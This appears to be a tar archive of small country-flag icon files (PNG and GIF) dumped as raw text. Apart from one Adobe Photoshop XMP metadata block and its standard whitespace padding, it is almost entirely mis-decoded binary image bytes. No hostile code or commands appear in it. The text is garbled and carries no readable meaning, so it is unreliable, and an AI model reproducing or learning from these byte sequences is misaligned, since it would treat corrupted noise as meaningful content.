d�r`)��B(�Ͱ*`/�@4�Qh��p.�U�=p�a��(��	A�a!ڈb�X#����!�H�$ ɈQ"K�5H1R�T UH�=r9�\F��;�2����G1���Q=��C��7�F��dt1�����r�=�6��Ыhڏ>C�0��3�l0.��B�8,	�c˱"����V����cϱw�E�	6wB aAHXLXN�H� $4�	7	�Q�'"��K�&���b21�XH,#��/{�C�7$�C2'��I��T��F�nR#�,��4H#���dk�9�, +ȅ����3��!�[
�b@q��S�(R�jJ��4�e�2AU��Rݨ�T5�ZB���R�Q��4u�9̓IK�����hh�i��t�ݕN��W���G���w
��Ljg(�gw��L�Ӌ�T071���oUX*�*|��
�J�&�*/T����ުU�U�T��^S}�FU3S�	Ԗ�U��P�SSg�;���g�oT?�~Y��Y�L�OC�Q��_�� c�x,!k
��u�5�&���|v*�����=���9C3J3W�R�f?�q��tN	�(���~���)�)�4L�1e\k����X�H�Q�G�6����E�Y��A�J'\'Gg����S�Sݧ
�M=:��.�k���Dw�n��^��Lo��y��}/�T�m���GX�$��<�5qo</���QC]�@C�a�a�ᄑ��<��F�F�i�\�$�m�mƣ&&!&KM�M�RM��)�;L;L���͢�֙5�=1�2��כ߷`ZxZ,����eI��Z�Yn�Z9Y�XUZ]�F���%ֻ�����N�N���gð�ɶ�����ۮ�m�}agbg�Ů��}�}��=
���Z~s�r:V:ޚΜ�?}���/gX���3��)�i�S��Ggg�s�󈋉K��.�>.���Ƚ�Jt�q]�z�������ۯ�6�i�ܟ�4�)�Y3s���C�Q��?��0k߬~OCO�g��#/c/�W�װ��w��a�>�>r��>�<7�2�Y_�7��ȷ�O�o�_��C#�d�z����%g��A�[��z|!��?:�e����A���AA�����!h�쐭!��Α�i�P~���a�a��~'���W�?�p�X�1�5w��Cs�D�D�Dޛg1O9�-J5*>�.j<�7�4�?�.fY��X�XIlK9.*�6nl�������{�/�]py�����.,:�@L�N8��A*��%�w%�
y��g"/�6ш�C\*N�H*Mz�쑼5y$�3�,幄'���L
Lݛ:��v m2=:�1����qB�!M��g�g�fvˬe����n��/��k���Y-
�B��TZ(�*�geWf�͉�9���+��̳�ې7����ᒶ��KW-X潬j9�<qy�
�+�V�<���*m�O��W��~�&zMk�^�ʂ��k�U
�}����]OX/Yߵa���>������(�x��oʿ�ܔ���Ĺd�f�f���-�[����n
�ڴ
�V��E�/��(ۻ��C���<��e����;?T�T�T�T6��ݵa�n��{��4���[���>ɾ�UUM�f�e�I���?�����m]�Nmq����#�׹���=TR��+�G�����w-
6
U����#pDy��	�
:�v�{���vg/jB��F�S��[b[�O�>����z�G��4<YyJ�T�i��ӓg�ό���}~.��`ۢ�{�c��jo�t��E���;�;�\�t���W�W��:_m�t�<���Oǻ�����\k��z��{f���7���y���՞9=ݽ�zo�����~r'��˻�w'O�_�@�A�C݇�?[�����j�w����G�������C���ˆ
��8>99�?r��C�d�&����ˮ/~�����јѡ�򗓿m|�����������x31^�V��w�w��O�| (�h���SЧ�������c3-�@�iTXtXML:com.adobe.xmp<?xpacket begin="" id="W5M0MpCehiHzreSzNTczkc9d"?>
<x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.6-c067 79.157747, 2015/03/30-23:40:42        ">
   <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#">
      <rdf:Description rdf:about=""
            xmlns:xmp="http://ns.adobe.com/xap/1.0/"
            xmlns:dc="http://purl.org/dc/elements/1.1/"
            xmlns:photoshop="http://ns.adobe.com/photoshop/1.0/"
            xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/"
            xmlns:stEvt="http://ns.adobe.com/xap/1.0/sType/ResourceEvent#"
            xmlns:tiff="http://ns.adobe.com/tiff/1.0/"
            xmlns:exif="http://ns.adobe.com/exif/1.0/">
         <xmp:CreatorTool>Adobe Photoshop CC 2015 (Windows)</xmp:CreatorTool>
         <xmp:CreateDate>2015-11-20T13:09:21+04:00</xmp:CreateDate>
         <xmp:ModifyDate>2015-11-20T15:45:14+04:00</xmp:ModifyDate>
         <xmp:MetadataDate>2015-11-20T15:45:14+04:00</xmp:MetadataDate>
         <dc:format>image/png</dc:format>
         <photoshop:ColorMode>3</photoshop:ColorMode>
         <photoshop:ICCProfile>sRGB IEC61966-2.1</photoshop:ICCProfile>
         <photoshop:DocumentAncestors>
            <rdf:Bag>
               <rdf:li>adobe:docid:photoshop:09542d97-8f71-11e5-94a6-ee3452282a2a</rdf:li>
               <rdf:li>adobe:docid:photoshop:38d679da-8f68-11e5-94a6-ee3452282a2a</rdf:li>
               <rdf:li>adobe:docid:photoshop:5dfd2cff-8f74-11e5-94a6-ee3452282a2a</rdf:li>
               <rdf:li>adobe:docid:photoshop:8e3a214f-8f73-11e5-94a6-ee3452282a2a</rdf:li>
               <rdf:li>adobe:docid:photoshop:8fb5b417-8f70-11e5-94a6-ee3452282a2a</rdf:li>
               <rdf:li>adobe:docid:photoshop:9e542de9-8f73-11e5-94a6-ee3452282a2a</rdf:li>
               <rdf:li>adobe:docid:photoshop:a2f84fe0-8f71-11e5-94a6-ee3452282a2a</rdf:li>
               <rdf:li>adobe:docid:photoshop:b32790cc-8f68-11e5-94a6-ee3452282a2a</rdf:li>
               <rdf:li>adobe:docid:photoshop:b346ee9f-8f70-11e5-94a6-ee3452282a2a</rdf:li>
               <rdf:li>adobe:docid:photoshop:bfb95827-8f68-11e5-94a6-ee3452282a2a</rdf:li>
               <rdf:li>xmp.did:207A2A028ED511E59E31AD700287C36D</rdf:li>
               <rdf:li>xmp.did:278A62E98ED511E58E97963F18B52A94</rdf:li>
               <rdf:li>xmp.did:7666621B8EAD11E5B311FE3B750CF709</rdf:li>
               <rdf:li>xmp.did:8DE1DF2D8ED611E596B0B1168CB967CD</rdf:li>
               <rdf:li>xmp.did:B17B21968F6111E5B217C3E55942F08F</rdf:li>
               <rdf:li>xmp.did:F827112B8ED511E5B4FECF7614BCA1A9</rdf:li>
            </rdf:Bag>
         </photoshop:DocumentAncestors>
         <xmpMM:InstanceID>xmp.iid:2c6715df-7731-a84c-b26e-47221ead657d</xmpMM:InstanceID>
         <xmpMM:DocumentID>adobe:docid:photoshop:2579814e-8f7c-11e5-94a6-ee3452282a2a</xmpMM:DocumentID>
         <xmpMM:OriginalDocumentID>xmp.did:8f98ee12-89ba-6b48-9f5c-728a2661e30f</xmpMM:OriginalDocumentID>
         <xmpMM:History>
            <rdf:Seq>
               <rdf:li rdf:parseType="Resource">
                  <stEvt:action>created</stEvt:action>
                  <stEvt:instanceID>xmp.iid:8f98ee12-89ba-6b48-9f5c-728a2661e30f</stEvt:instanceID>
                  <stEvt:when>2015-11-20T13:09:21+04:00</stEvt:when>
                  <stEvt:softwareAgent>Adobe Photoshop CC 2015 (Windows)</stEvt:softwareAgent>
               </rdf:li>
               <rdf:li rdf:parseType="Resource">
                  <stEvt:action>converted</stEvt:action>
                  <stEvt:parameters>from application/vnd.adobe.photoshop to image/png</stEvt:parameters>
               </rdf:li>
               <rdf:li rdf:parseType="Resource">
                  <stEvt:action>saved</stEvt:action>
                  <stEvt:instanceID>xmp.iid:2c6715df-7731-a84c-b26e-47221ead657d</stEvt:instanceID>
                  <stEvt:when>2015-11-20T15:45:14+04:00</stEvt:when>
                  <stEvt:softwareAgent>Adobe Photoshop CC 2015 (Windows)</stEvt:softwareAgent>
                  <stEvt:changed>/</stEvt:changed>
               </rdf:li>
            </rdf:Seq>
         </xmpMM:History>
         <tiff:Orientation>1</tiff:Orientation>
         <tiff:XResolution>720000/10000</tiff:XResolution>
         <tiff:YResolution>720000/10000</tiff:YResolution>
         <tiff:ResolutionUnit>2</tiff:ResolutionUnit>
         <exif:ColorSpace>1</exif:ColorSpace>
         <exif:PixelXDimension>23</exif:PixelXDimension>
         <exif:PixelYDimension>22</exif:PixelYDimension>
      </rdf:Description>
   </rdf:RDF>
</x:xmpmeta>
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                            
<?xpacket end="w"?>�5�� cHRMz%������u0�`:�o�_�F�IDATxڼ��nAƿ�;��l'��D,H���"�B��7�
ހ���A!D�@d��߉db|��9��
SD&�DL��������6�?�?�(�P���pf���@+ y(Ұ���`�
�D�Q�Tl&�r�ƙ���R&Z���C�6A����yv�ZP�+���^�����zq@��A�l4*w7׫5�zI��l��-�hd̯9��W��}-��.��F雝ﵢz��W�rWV�d�)N�1�O�k�ڊR�[�z��V��η���
�w�t���~rI�8�����
ɣ����F�V�����_<߮�yKRp�VW���}���r��1�O��(zEu_)&�M�t����k+��<Aӈ��X�L�L�Ifu�ɹ�gLj���]~&���(�s�a$7��UO�����}�A�Sv��@Ld!L�LO�9�1)vb!sR&I���?�"��!7�IEND�B`�images/flags/lc.png000060400000001010152434416630010205 0ustar00�PNG


IHDR���ntEXtSoftwareAdobe ImageReadyq�e<�IDATx�4Q=kTA�3o7Y7F0!M@Ơ�؄�P���,�����&��b�h*��kH�*�6�@A,�}�o�{sg��ހ�|�{>��/�b첌t��m��	��D�&J��at�h�#��MH�C�y���7�� F��$�F���Q
�H6��ʭ�|��+�8;�B4��yG�sn��J��[����/�d���Q�*0T�+�:1�@�ƕ�t��a�t��FQ�U�Օ:&�
5��ʺF����!T����5qh̒�Z%���`���������Y��������Ko����Ty�}�^��
+�y}��$����ͳ��,�	�[놝�
~7O��E��;���*+�._���<K��L�:%�H3�9�}t�г�I������R3���J"�5Mf�VF�V�7�2�'�5�U�(B�IEND�B`�images/flags/rs.png000060400000000647152434416630010252 0ustar00�PNG


IHDR���ntEXtSoftwareAdobe ImageReadyq�e<IIDATx�tPMK�@�m6�\D��Z�؜{��UQ��G���7��QD�W�գ ��TQ����4"��q6�����ff罙���Q�3Ÿ�x��">H��v��d�y��ȘE�>���_+*���7��>�a�o���	�$k��;��iܘLZ=�K��/�-]w�T��������ڋ��Q���ߩθ�Œ�*v��d���2렌�\�4�jMxo\E�un���F8%dQ�Ase�r��w�^��2� :���D��B�W����Nomy��T��,+C�$۶az�yh�B��V� ��-��?�
0Xx�<��4�IEND�B`�images/flags/va.png000060400000001051152434416630010222 0ustar00�PNG


IHDR���ngAMA��7��tEXtSoftwareAdobe ImageReadyq�e<�IDATx�b|}^���;�������#��=&���Ͽ���r?P5�����H�?���E8���/^�`����?Hϟ���g�`���?�?���`����! u0�@��f���ϗO����������P@1�6l�����������z����E���]������?�ÿ�`�`�������4��g��'O��7������ �X�}���b<��ٿ~����.%>iF��ǎIɲ1��E �����+����Ż�7ؙߚ������勗�u��?P�@<���Y�?�n
F&F&FV������E��b2��0��������pN!!`��xw?ÿ��e�
���I ����?�h�h0S�F.7���IEND�B`�images/flags/es.gif000060400000000261152434416630010206 0ustar00GIF89a��O�F��N�B��wT�YC�UJʼn(͜�`$ե	��NJCÖD�Y�M�����jMƞ7�u������!�,.`&�di�h�b,�HJ��4V@�"�|B�
�F &�!�aDʨRE�ZQ!;images/flags/hr.gif000060400000000446152434416630010215 0ustar00GIF89a�&��������(G��������;1|���4&ryBS����86`|u�VW���Z7l�����UL���"!u���w{lheZ�&(������l�������f���!�?,C��pH,�Hc��a@�D��9K��'$����p��0��Ql�bK0h�I��%21$�y������A;images/flags/kh.png000060400000001045152434416630010221 0ustar00�PNG


IHDR���ngAMA��7��tEXtSoftwareAdobe ImageReadyq�e<�IDATx�bd������a`�dC���` �_
}j@�@����d����_�����a������G�����_�^�**��?D�/ �7H5P���WZ����
@����������Z��O6		���wn3������~����l���A�2��
t����Du�d]-+/7��)P���/��b���_����32	�gp{x2pp2pp�����ga������ �X�6�a9�3'���� �H>OO&&6V��`�	` ������
1���Fv��rK�0}�^@�#�²��O�u�a`���/8X���@n���z^A�{��Utߧ��"�`9P��<(LA�a����/�>�ڰ�yЈDC�1
AL�43�U���IEND�B`�images/flags/fi.png000060400000000751152434416630010220 0ustar00�PNG


IHDR���ngAMA��7��tEXtSoftwareAdobe ImageReadyq�e<{IDATx�b|��30I��`�������2.�?��A�0����bab`��*���k�ƿ����e�Pr!���ڝ_��l8D�ٛ�@S����`dd���@����5�_ �ߟ?��$�d���1�5#����o~
������@m@w����?P�o� Ј����a_հ tl�@����
��4�Β�*�NW7�T`S����9��ba��d%�P�j�" ���/�c�`�����dx���qh*��W���s�'��>~�@�0��cfr��@V��@�5�:�<��Y�ƀ�z���;�@"rV�Q�_�(�������@��>}�`��i����IEND�B`�images/flags/et.gif000060400000000106152434416630010205 0ustar00GIF89a�:u���!�,�������ڋ��V���H��);images/flags/hu.gif000060400000000106152434416630010211 0ustar00GIF89a��F����#,!�,�������ڋ�����H��);images/flags/af.gif000060400000001034152434416630010164 0ustar00GIF89a�hh�`�@6|Pɶmmu��5�����⑻�=�|����
r[�R��ka���$P�?M���"zz�n��Q�F���i��~eჃ{�5ooiiv�����ɡ���$�� �?e�����``�q������+��	jbF��`M$tX����p\�6+�66��ń�1�����3�ff!�,y�CC"&A�����#	,���!<+;��@4%'8�16)9�@� 2�.?��?��-���C�@:�����
�C/��@=�3B��B7(5�0���$>*���
��;images/flags/ae.png000060400000000630152434416630010203 0ustar00�PNG


IHDR���ngAMA��7��tEXtSoftwareAdobe ImageReadyq�e<*IDATx�b�π��k������������P	���V8���)�妛/F4e{/ђ�"[����@`
��?y��/=����߿�����_���Ȑ��@,`��CT��t^�`dd|�� �X�Ne�;����ȓ���I@f�����;�/������ ��N���U�~�q�:	 �@�A�f�
kk�_�~���J�Y����篊��ŋ���II��?e����s!$���=��p$�@z�iٟ>IEND�B`�images/flags/ur.gif000060400000000474152434416630010233 0ustar00GIF89a�pn?�?U�Uk�ؾ������
l
��������7�7������P�P�™����q1�1��w���d�d�ӵ�׼s�ϯt(~(����Ѳ0�0R�R��y���j�ٿ���f!�,Y@�p�*��!�T
���RN����L�4.
E��C!+���0���
�Y.�P"wOE$B#'�YG	�ZLH��GA;images/flags/al.png000060400000001130152434416630010206 0ustar00�PNG


IHDR���ngAMA��7��tEXtSoftwareAdobe ImageReadyq�e<�IDATx�b���򏁁�X�0�����"�����#�8@��%'�U����߿,��y�5�����߹o�dr3����ϯ�ѕ�����|����w�B9�t���{��ϯ_�����}����	�e��Z@,�����?���W�������q��3���߿~fs2����߯_����
 ���~�5������3_�K�����?=���珟"�����_��~��
 ���5����
�_�߿K��A%/���_�����7��
!�c~������_��k�}c���ϯ��>�Kagd��h6Б@��~ ������??r�����c0��?~Qc�@A�j������@ ��Љ �6>f�?����f����!ֿ�~�|r6��
V��EĘ�!���O��0PȠ?�@FX@1��?���`H�Bc	,�0e�B@Mv�=IEND�B`�images/flags/br.png000060400000001121152434416630010215 0ustar00�PNG


IHDR���ngAMA��7��tEXtSoftwareAdobe ImageReadyq�e<�IDATx�bdHf@�`�/0�3 �@��5F7�g`�������￿6Z�X�l9���� �ϟ߿��������U���O�B�Y�����;K��^����?���K�_h@�5��T
T�5T�oUդ�$~������涐e�O;����o���	�b��L_g~
U�s�zhd�Č��Y�/�����D��:����U��6�[R�?�f���?����O���Gs�A��������_�2Ж�Ҷ����0<t��{��W�|x�_��D�˒_.�f�g �
��y��)h)˖���b�U?}�������n[��/�I��^��r�2|d �
����&�g��o�������~Ko2��,@��
`H��?$x$A����^�;�3˿�k���a�ܿ���(@128"b9F1���C/A��nIEND�B`�images/flags/europeanunion.png000060400000000737152434416630012515 0ustar00�PNG


IHDR���ntEXtSoftwareAdobe ImageReadyq�e<�IDATx�,Q=KA݋�1+!��)$��_`%Z�[$"��"���D�'v��4Dce!Q�$��Όo��v��Λyo�[�(y&&�b�5,3	�%�"�K�����`0`p(@KVia�Y�vZ��'���x��h�83����Tck���*U�Ɖ{��PbB�Ĝ����DNv��c�G�J-qQ|1����<�2T(��df�w��\�xbrs�tGC!cb��Fvs�Ϯ����7Q2D�y�lYJ׳�v
�%��
���<��I6ԇ��ב��=��M.��r5��C2V0��[��3�t����8���Oi���Hݻ��Dr԰:cl$��d�lb���%���~�
���{9r�o�Iww/��ݕ� �'���z�d}@fIEND�B`�images/flags/bi.png000060400000001243152434416630010211 0ustar00�PNG


IHDR���ngAMA��7��tEXtSoftwareAdobe ImageReadyq�e<5IDATx�b��*�/�*�~�e���1����Ǐ?���c`� ����?�OĨ�\�J�= ��ɓ_��ae������@m�������������9�81�<�
 ,39���]`,-�����)%��|�yҵ��E�O��M`��~C1��x��N�Io�=����x�0�p��M����Б�<���\�<���w����3�yd|��+h��G�3�� ���������rqp������?�V�U7����Ϸ>~�����/(4�!1������������#
/ଜ������ݢ�!)����������	Hu?|�P�Wz���������5�%�3������_]H�ƛ���1�����e,i73����feqp��놅������0��Əϊ���a:���@�};~�%��"�x����߿���������C��$n7`��e��e>��3������@��aC�얯�&�
 �}h&t����IEND�B`�images/flags/kz.png000060400000001150152434416630010240 0ustar00�PNG


IHDR���ngAMA��7��tEXtSoftwareAdobe ImageReadyq�e<�IDATx�bd����.�?�>�Q���?�`d0�I ��@�@
�U��1��a�������@�������������џ����?���ba``x� ��w0��q�Ar2�n������>_���4��/�����@11�����3��c���������m��Ϳ���֚�����@��� ���$��[�/h0��L�~p�������|O������/�f��	�?����'������K�o������_�\������o�%��B �X�a����Q�����[�]��K��O�?�����/���@
��@"��}��?����*{��k���K�����f�tҿ?�R�n��k�(0X�S��O���+��=�����F�P��I@���`���2(r�3�E���i��x��_d�_�q@	�bdX���_%�;x\���@�0001�iZsq��IEND�B`�images/flags/at.gif000060400000000133152434416630010201 0ustar00GIF89a����������̙33!�, ��0�邽AX����y���$&��+A�t�$;images/flags/ee.png000060400000000655152434416630010216 0ustar00�PNG


IHDR���ngAMA��7��tEXtSoftwareAdobe ImageReadyq�e<?IDATx�bdp���~�c�F����@�������?��P(��0�v`yS�+4�k����vrOVȦܙR��60
2�� ��O��A���߿ (�������/ ��?Yav�?�t�?��@�A�U�	R
R$����t��ba��״�ϣG��7B��_`F�����I��r�����4P� �@��)����|�d��F�ӧO�������
@J/\�@,��^+%�����@�P��� �@<x����ģ�`�0�.~�xۙVIEND�B`�images/flags/lv.png000060400000000721152434416630010240 0ustar00�PNG


IHDR���ngAMA��7��tEXtSoftwareAdobe ImageReadyq�e<cIDATx�b���
�10������db` �/���@��������������߿��I ����37m ���>y
R
D@90	�����_�~�r�ee���=�����(
4�����߿?10�˓'y��B���g:	�����2�A9,ll� ƿ�222���pF&��>˛s�ed�60@��n�
������ɓ�X����}P8���(���� P�_I���9�bz��
 �?�W@����`� �X���.II�1����E0B���:0������,"!E�/�h�D?@�|(�IE�PZIEND�B`�images/flags/aw.png000060400000001014152434416630010222 0ustar00�PNG


IHDR���ngAMA��7��tEXtSoftwareAdobe ImageReadyq�e<�IDATx�,�	 �(�}X�Uِ9� ��aJs������9H �͗DQ�by���kIϣk7�G�``��������� -�����?a�1�b��`�����Ҟ�Aſ���������� ���A��<���ӧ_�Z����g�_���@*��TR��/��B@�����/,l���~%�������߯�PK�"�����/�������!n�&����a�}@,?Av1��������hd
`��j �߷����y�t<����ed�se@��N������O�C�f�[�*v=�K��k���U�"`0Mb�'(H����=�@60����K��!?ç��F$(:��_�h�2��\,hҪ�U�IEND�B`�images/flags/bn.png000060400000001177152434416630010224 0ustar00�PNG


IHDR���ngAMA��7��tEXtSoftwareAdobe ImageReadyq�e<IDATx�b�z������Pƿ? ��P�0 �bl0�0��7��\Q :F+@�B����k��W+��PZ8&Ԛ�/�X 3�D3�����տ�~y���'N�_�~�f`�����/FV�=���aem
����������[��G~�(?``���߷~���������[1�wyy������bhh"����������������y�����hpQQ�Ç���?�V��,���T�?-����O���`�������b�|��Q������~�f�j����$ׯߝ��2Y��u����޿1���u�����������#��u��������311cee555���Ev���?��g������A���>�w�߿~��篊��ŋ�R@9Ff������?���Ll��V��}���O��<������@��ӠXF�_P�dba�d�4�p��a�w� �p1��iIEND�B`�images/flags/um.png000060400000001073152434416630010241 0ustar00�PNG


IHDR���ngAMA��7��tEXtSoftwareAdobe ImageReadyq�e<�IDATx�b�n������?�������[����������(���ۿ���<��nۉW�~��r��߿}���˗O`��Ç��
�bj������0j@����״0|�����߿���IX���-��(�`#����@ y�e��Ț�/?������q(�LL̷v� ����=�
h*P5��������gx��?@����3��
��@,@�9�9�d�W@r恗�6µ�^2/]
	����$3��ٳ����@Q��@��8���U�_~�����������ǟ?RG���絴��������p�
1�g
���E$%�gN����}����߿%A������?~�����_6ii��'��СC&&&s�m�������O��?=���x���txD��1�00|���10|�@`FEH{���IEND�B`�images/flags/hm.png000060400000001241152434416630010221 0ustar00�PNG


IHDR���ngAMA��7��tEXtSoftwareAdobe ImageReadyq�e<3IDATx�b<^�|�C�rǻ��X����V*���D�s�����g�����10�1�KM��y<������"���������[M-���ܣ��1��		������������=����F;!��� ����鐎��>���_aQY.3�߲�we�~������p�k���t	an�o��!$�AXx�?��<�/X�	�1��~�q�S��-L����w��+���"��1�,�
����������������%"��������������1���)-D.����	����������������WK+���	�Ѿ�	p����/�^�6�����c�����?�������ϟz����ۿ�����ׯ?@�H�I��i������?`���|�V?����?P@�5M���y䮾��d%�~�������͵��~���f�5�������?�:��d��c��M���`
��w��IEND�B`�images/flags/ro.png000060400000000757152434416630010250 0ustar00�PNG


IHDR���ngAMA��7��tEXtSoftwareAdobe ImageReadyq�e<�IDATx�bd�>���010��?`������`��
�!@�0��SݤT���L����?����D~��?��߿���_6m ��O^�����L��=b`����o(���_���f���@, ��3U��B@����&����C40��
�@,��U������xE�t�ba�����0
�����Nb��h@�4���P�_$
`�I�`'H�������u�
`�n@�0���������I���?@
��� �����TR�䍿�LL�����������R0:	 ��20�K�\�|o0ÿ?�x���C�'�o�E��EIEND�B`�images/flags/fr.png000060400000001041152434416630010222 0ustar00�PNG


IHDR���ngAMA��7��tEXtSoftwareAdobe ImageReadyq�e<�IDATx�b,�z���������ߟ?�?�022*������'���b���������¦$��A�@�? �������~����mE@�40�g���߿ _�~�@6�x�=|Ϟ�����"@K�89�0K����t�&�8�@��[z��M"-����b봗�b���P�߿@��*)�q�m@�@�����/��A0�0���q�;���^7��Lh�3�����
|�Tt��@�P�?zD�����_���6ˏ_@������A]T
a�U��V�����j�=�I,�$��߿���@�|z��?.Nf ��&H�@���%��1��d@�|���m��?~}���ˏ_Ҝ�@������Ǐz���A��{f�uDIEND�B`�images/flags/eo.gif000060400000000272152434416630010204 0ustar00GIF89a��������������������k�kI�I��������<�<�ۧ.�.��������ܯޯz�z����.�.�������!�,7 &�Of�h6.b���!Y���)1�#8�h�8`\A�B�D��	 ��t��z�`i;images/flags/bg.png000060400000000716152434416630010213 0ustar00�PNG


IHDR���ngAMA��7��tEXtSoftwareAdobe ImageReadyq�e<`IDATx�b���+����Df�����(���$��������SH�ŋ�S���`ddZ@,w>ݑa����/B��? �0D�L,��� F�f�2��G�����~��
B��$�����D����t �c�������5S	��d޲�I�U����%�s��XR�af���:��%�@�a´f�!��|g�
W�0a����ן���� �����b��@���s� @����,���=�q S@�;JB~3��˨򷎁 �X������$P(����? $��A@����H���&<�e�*k�:IEND�B`�images/flags/scotland.png000060400000001211152434416630011421 0ustar00�PNG


IHDR���ngAMA��7��tEXtSoftwareAdobe ImageReadyq�e<IDATx�b|��C���[�\b��`�b����?�_`�ýww?��H����;@1��|��&����ߦ������G��/H� x���ۤ0E.f����M;@̇.[����21��<�����o�{��Ǜ;lm$�=eX��7=\�� ��<�
D8|�!�#��b ��l"������.)ճS�*=��g˹��;� �X�v��g��w����b�R�̛���@��{�=�-��[����7�b��oV���\'�����	7�ٻ��/�_l�~�c�� ��@60���ϯ����d�� k8]kd���_����9���~�N�0��*���s�����3�aa���G_(���_V`X2ñ����
 �g�T~��OfF��#=���Tx�F
@1�ο�,F(����ew�<��[��7�?�����ϣ�����k�1�g���
@��������Ƿk�0�r0H�0|��f�R��
��P�+��@@�)Kӣi�IEND�B`�images/flags/az.gif000060400000000260152434416630010210 0ustar00GIF89a��5����5D�7F�~����bm�8�.�4�\j�t��3����"H����HV�3�f��!�,- %�di�h����Ғ
l�sD��;��
�o�l:�ШtJ�BC;images/flags/hi.gif000060400000000173152434416630010201 0ustar00GIF89a�//�00����00�..����qq�tt�ww����nn�//������3�!�,(��I��8�m���,	h�bg��º�8���|��p�;images/flags/pw.png000060400000001046152434416630010246 0ustar00�PNG


IHDR���ngAMA��7��tEXtSoftwareAdobe ImageReadyq�e<�IDATx�bd�����c�"��?�#Yp('E�0)�YH��k�p��s{�2ǿRʈ�)k�RqQ{�@,L �O�������H���v?���������P�,#ÿ�2���@;�0�+�Wjedx��A�Ph�u��b���/H��@WP�_���~{�Mddx��01>�T^���������> &�����02��a�
�>�[�Ǭ�����
 �
�����7�ߊp
����'����� �����X����_�����?�?��ވ��
�c��@s� ���e��Ü��w?�xʬ�s���w�>�+$>�� ��~�c��fK0\}�v�+(�3�����/#0f�!	t@12�e���?@�P�?�h���:��ZYIEND�B`�images/flags/gt.png000060400000000755152434416630010240 0ustar00�PNG


IHDR���ngAMA��7��tEXtSoftwareAdobe ImageReadyq�e<IDATx�bdN����c`����,��$��ߧo��#����8�������������(."��� ��F�������Ͽ��*�H��@!�����Q@Ew_�4���_Z�h@�]2���1@s���_�6�,a�
 �X����cr����T������{~5�b ���������
���P?}4 �����@���I�!N��rҟ�� ���a�� s�ï�0E�@�E @���4@�#�?&1>�%?~102�D!3#��0��nY�� �\�2�����No{����ϟ`���W{1p*�1 ��s�����IEND�B`�images/flags/ng.png000060400000000742152434416630010226 0ustar00�PNG


IHDR���ngAMA��7��tEXtSoftwareAdobe ImageReadyq�e<tIDATx�bd����10�a��v_�M�߿ ���x�ަ�b``a �/ծ�������3q00�� �o����?������M37PP��ק����L��(x���_�~���[�Gh@�1�d�� ���?���H���@t@�����?���j�� 
A6P@�=4���_����8	�� �@�����p:�?��ir��@տ�����$O�
���&�* ��@JCV�5��
P1@�c
ƒܒ o�����	�L�J�J��!��_��P��	Ǡ���p���$�������+�gP43���0�|v P���IEND�B`�images/flags/cf.png000060400000001146152434416630010211 0ustar00�PNG


IHDR���ngAMA��7��tEXtSoftwareAdobe ImageReadyq�e<�IDATx�b�Կ��/��Vҿ�9����~a�xA�/���c��2����L��1�ئ�}�2���k����
�m����<���������������n����_��9��l����o��������O���R���? ).��� ��<y)%%
���(�����������0���FF�����o�ff���`�~�4 �)@e�? ���i��~~:�￿�����'���9���~�|���Av��m%IJm�6UE�_������?������W4�_������������җ
_������@3�J��A��H���]�?l�R������������7(���5����<���I�����3� �X8t���/��?���
b�f���I�F�@!1[�b<t������������$�����]��P��\�Rw�IEND�B`�images/flags/si.png000060400000000776152434416630010244 0ustar00�PNG


IHDR���ngAMA��7��tEXtSoftwareAdobe ImageReadyq�e<�IDATx�b���+����Df�����(����?Ï�sq0�5�(��|�@,���<~��=󿿭��LL��FFF�%��,xxB�����B��,~���������������? CB�}��C���O~ԙ��g[�s=b��of��_@
�����~ɿ>�f`x@@'���a��W"��������_����_`b����B ��X��c��l���@�@#�0����/ï��P���L@������ӧ@g��r2�:�ן�@��@���%'3L �����/��v��o���!.��7�A�?T��=L@JJ�@����b�a��@�/#0��!!T.�^�\1 Pp,IEND�B`�images/flags/pt.gif000060400000000446152434416630010227 0ustar00GIF89a��`�l8z*�%V�^�?�%n�˒ҫ�Ɯ��h"�uX���͆$�_G�jR�&?�$�|�iN�mG�{O�!�g0���|��jnެ��Վ�pb3�$!�,C@�p
��q�l.���R@�F��`&X�ƒh0>�(�Pd ��z(�T6N�x)XJO�Y��OE�A;images/flags/dj.png000060400000001074152434416630010216 0ustar00�PNG


IHDR���ngAMA��7��tEXtSoftwareAdobe ImageReadyq�e<�IDATx�b<|���=/�1p�100������?�?~����Ͽ�"�~�3~�cca �����p�1�����߿�������/��?�f��@,@<f*���N�f���?H���������a�@ 
@K�����7����/�j����@1���a��_�
s3x��������&b�����0���g�o���'��`F��
